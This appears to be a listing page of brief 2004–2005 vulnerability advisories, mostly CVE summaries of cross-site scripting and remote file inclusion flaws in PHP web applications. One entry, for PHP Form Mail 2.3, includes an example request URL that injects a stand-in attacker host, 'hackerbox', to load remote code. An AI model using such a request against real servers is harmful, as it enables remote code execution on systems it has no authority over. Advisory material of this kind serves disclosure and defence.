The Includer 1.01.1 - Remote File Inclusion

The Includer 1.01.1 - Remote File Inclusion source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter. A...

The Includer 1.0/1.1 - Remote File Inclusion

source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter. An attacker may leverage this issue to execut...

PT-2005-1861 · Php · Php-Post

Name of the Vulnerable Software and Affected Versions: PHP-Post versions prior to 0.33 Description: A cross-site scripting XSS issue allows remote attackers to inject arbitrary web script or HTML. Recommendations: For versions prior to 0.33, update to version 0.33 or later to resolve the issue...

security flaw

Cross-site scripting XSS vulnerability in the driver script in mailman before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via a URL, which is not properly escaped in the resulting error page...

CVE-2005-0723

Cross-site scripting XSS vulnerability in the jumpmenu function in functions.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameters, which is not properly cleansed in the $pageurl variable, as demonstrated using pafiledb.php...

CVE-2005-0656

Multiple cross-site scripting XSS vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the 1 hits parameter to hits.php, 2 query parameter to index.php, or 3 theCount parameter to counter.php...

CVE-2005-0674

Cross-site scripting XSS vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request...

CVE-2005-0660

Multiple cross-site scripting XSS vulnerabilities in D-Forum 1.11 allows remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3...

PHP Form Mail 2.3 - Arbitrary File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...

CVE-2005-0628

Multiple cross-site scripting XSS vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via 1 the keyword parameter in search.php or the 2 body or 3 subject of a forum message...

CVE-2005-0641

Cross-site scripting XSS vulnerability in the Reporter for Computer Associates CA Unicenter Asset Management UAM 4.0 allows remote attackers to inject arbitrary HTML or web script via the 1 name or 2 description in a report template...

CVE-2004-1055

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the PmaAbsoluteUri parameter, 2 the zerorows parameter in readdump.php, 3 the confirm form, or 4 an error message generated by the internal...

CVE-2005-0629

Multiple cross-site scripting XSS vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the 1 user or 2 Avatar parameters...

CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection

source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. An attacker may leverage this...

CVE-2004-1711

Cross-site scripting XSS vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter...

CVE-2004-1730

Cross-site scripting XSS vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via 1 the return parameter to loginpage.php, 2 e-mail field in signup.php, 3 action parameter to loginselectprojpage.php, or 4 hidestatus parameter to viewallset.php...

CVE-2004-1716

Cross-site scripting XSS vulnerability in PForum before 1.26 allows remote attackers to inject arbitrary web script or HTML via the 1 IRC Server or 2 AIM ID fields in the user profile...

CVE-2005-0534

Multiple cross-site scripting XSS vulnerabilities in MediaWiki 1.3.x before 1.3.11 and 1.4 beta before 1.4 rc1 allow remote attackers to inject arbitrary web script...

PANews 2.0 - PHP Remote Code Execution

source: https://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'adminsetup.php' script. Reports indicate that wh...

CVE-2004-1589

Cross-site scripting XSS vulnerability in GoSmart Message Board allows remote attackers to execute inject web script or HTML via the 1 Category parameter to Forum.asp or 2 MainMessageID parameter to ReplyToQuestion.asp...